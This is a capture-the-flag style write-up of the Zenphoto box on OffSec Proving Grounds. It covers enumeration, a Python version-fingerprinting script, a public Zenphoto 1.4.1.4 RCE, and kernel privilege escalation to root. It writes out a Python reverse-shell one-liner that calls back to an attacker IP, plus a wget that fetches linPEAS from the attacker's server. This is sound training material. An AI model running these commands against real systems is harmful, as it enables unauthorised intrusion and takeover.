Zenphoto

Writeup for Zenphoto from OffSec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.163.41 all

Service Enumeration

HTTP (Port 80)

gobuster dir -u http://192.168.163.41/ -w /usr/share/dirb/wordlists/common.txt -t 40

We see /test and /index, which are of interest.

/index

Seems like it's just a blank page.

/test

/test looks more interesting and we can see that it is powered by Zenphoto.

Let's try to see if we can find the version number.

Looks like this is running Zenphoto 1.4.1.4.

A quick Google search shows that Zenphoto 1.4.1.4 is vulnerable to an 'ajax_create_folder.php' Remote Code Execution, for which a public exploit exists.
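Fingerprinting the version by hand works for one box, but the same check is easy to script. The following is an added example (not code from the writeup or from Zenphoto): it pulls the "Zenphoto x.y.z" string out of a page and compares it against 1.4.1.4. The sample HTML is constructed here, not captured from the target, and it assumes the version appears next to the word "Zenphoto" in the page body, which is how the writeup spotted it. Treating releases older than 1.4.1.4 as affected is also an assumption; the writeup only confirms 1.4.1.4.

```python
import re
import urllib.request

# The release the writeup identifies as affected by the ajax_create_folder.php RCE.
AFFECTED_VERSION = (1, 4, 1, 4)

# Constructed sample page (not captured from the target). It assumes the version
# string follows the word "Zenphoto", optionally after a closing </a> tag.
SAMPLE_HTML = """<html><head><title>test</title></head>
<body><div id="credit">Powered by <a href="http://www.zenphoto.org">Zenphoto</a> 1.4.1.4</div>
</body></html>"""

# Match "Zenphoto 1.4.1.4", "Zenphoto v1.4", "Zenphoto</a> 1.4.1.4", case-insensitively.
# The hostname "zenphoto.org" does not match because a digit must follow.
VERSION_RE = re.compile(r"Zenphoto(?:</a>)?\s*v?(\d+(?:\.\d+)+)", re.IGNORECASE)


def parse_version(version_str):
    """Turn '1.4.1.4' into (1, 4, 1, 4) so versions compare numerically, not lexically."""
    return tuple(int(part) for part in version_str.split("."))


def find_zenphoto_version(html):
    """Return the first version string found after 'Zenphoto' in the HTML, or None."""
    match = VERSION_RE.search(html)
    return match.group(1) if match else None


def is_affected(version_str):
    """True when the version is 1.4.1.4 or older.

    Assumption: older releases carry the same vulnerable plugin. The writeup
    only confirms 1.4.1.4 itself, so verify before relying on a hit.
    """
    if version_str is None:
        return False
    return parse_version(version_str) <= AFFECTED_VERSION


def fetch_version(url, timeout=10):
    """Fetch a live page and extract the version (network; not exercised offline)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return find_zenphoto_version(body)


if __name__ == "__main__":
    version = find_zenphoto_version(SAMPLE_HTML)
    print(f"version: {version}, affected: {is_affected(version)}")
```

Against the live target this would be `fetch_version("http://192.168.163.41/test/")`; a None result means the version string is not in the body and you need to look elsewhere (response headers, the zp-core directory) rather than assume it is not Zenphoto.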

Exploit

Running the public exploit gives us command execution on the box. Now that we have a shell, we can use Python to get a more stable reverse shell.

Payload (start a listener on port 443 on the attacking machine first; RHOST and RPORT are the attacking IP and the listening port): export RHOST="192.168.49.163";export RPORT=443;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Privesc

Next, we can start a Python HTTP server to get linPEAS onto the machine.

Attacking machine: python3 -m http.server 8000

Target machine: wget 192.168.49.163:8000/opt/PEASS-ng/linPEAS/linpeas

The URL path is relative to the directory the HTTP server was started in, so either start it from / or adjust the path to where linPEAS lives on the attacking machine. Make the downloaded file executable before running it.

linPEAS reports several kernel exploits matching this kernel version.

We tried the first one, dirtycow 2, but it didn't work reliably (Dirty COW is a race-condition exploit and distribution kernels frequently backport the fix without changing the version number), so we tried the second one, rds, and it worked.

We can use the same Python HTTP server to get rds onto the target machine.

And we get root after running rds.
